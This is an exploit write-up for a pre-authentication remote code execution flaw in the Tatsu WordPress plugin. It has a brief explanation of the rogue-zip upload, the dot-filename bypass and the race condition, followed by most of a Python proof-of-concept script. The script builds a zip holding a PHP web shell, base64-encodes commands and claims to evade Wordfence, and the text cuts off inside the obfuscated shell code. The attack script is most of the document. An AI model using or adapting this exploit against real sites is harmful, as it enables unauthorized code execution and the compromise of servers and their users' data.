Tatsu < 3.3.12 - Unauthenticated RCE

The plugin add_custom_font action can be used without prior authentication to upload a rogue zip file which is uncompressed under the WordPress’s upload directory. By adding a PHP shell with a filename starting with a dot “.”, this can bypass extension control implemented in the plugin. Moreover, there is a race condition in the zip extraction process which makes the shell file live long enough on the filesystem to be callable by an attacker.

PoC

#!/usr/bin/python3 # coding: utf-8 # Tatsudo: Tatsu <= 3.3.8 pre-auth RCE exploit # The exploit bypass Wordfence # # Product: Tatsu wordpress plugin <= 3.3.8 # CVE: CVE-2021-XXX / Vincent MICHEL (@darkpills) # Editor: Tasubuilder / BrandExponents.com # URL: https://tatsubuilder.com/ import sys import requests import argparse import urllib3 import threading import time import base64 import queue import io import os import zipfile import string import random from datetime import datetime urllib3.disable_warnings() class HTTPCaller(): def init(self, url, headers, proxies, cmd): self.url = url self.headers = headers self.proxies = proxies self.cmd = cmd self.encodedCmd = base64.b64encode(cmd.encode(“utf8”)) self.zipname = None self.shellFilename = None if self.url[-1] == ‘/’: self.url = self.url[:-1] if proxies: self.proxies = {“http” : proxies, “https” : proxies} else: self.proxies = {} def generateZip(self, compressionLevel, technique, customShell, keep): buffer = io.BytesIO() with zipfile.ZipFile(buffer, “w”, zipfile.ZIP_DEFLATED, False, compressionLevel) as zipFile: if technique == “custom” and customShell and os.path.isfile(customShell): with open(customShell) as f: shell = f.readlines() shell = “\n”.join(shell) self.shellFilename = os.path.basename(customShell) if self.shellFilename[0] != “.”: self.shellFilename = “.” + self.shellFilename zipFile.writestr(self.shellFilename, shell) elif technique == “php”: # a lazy obfuscated shell, basic bypass Wordfence # i would change base64 encoding for something better shell = "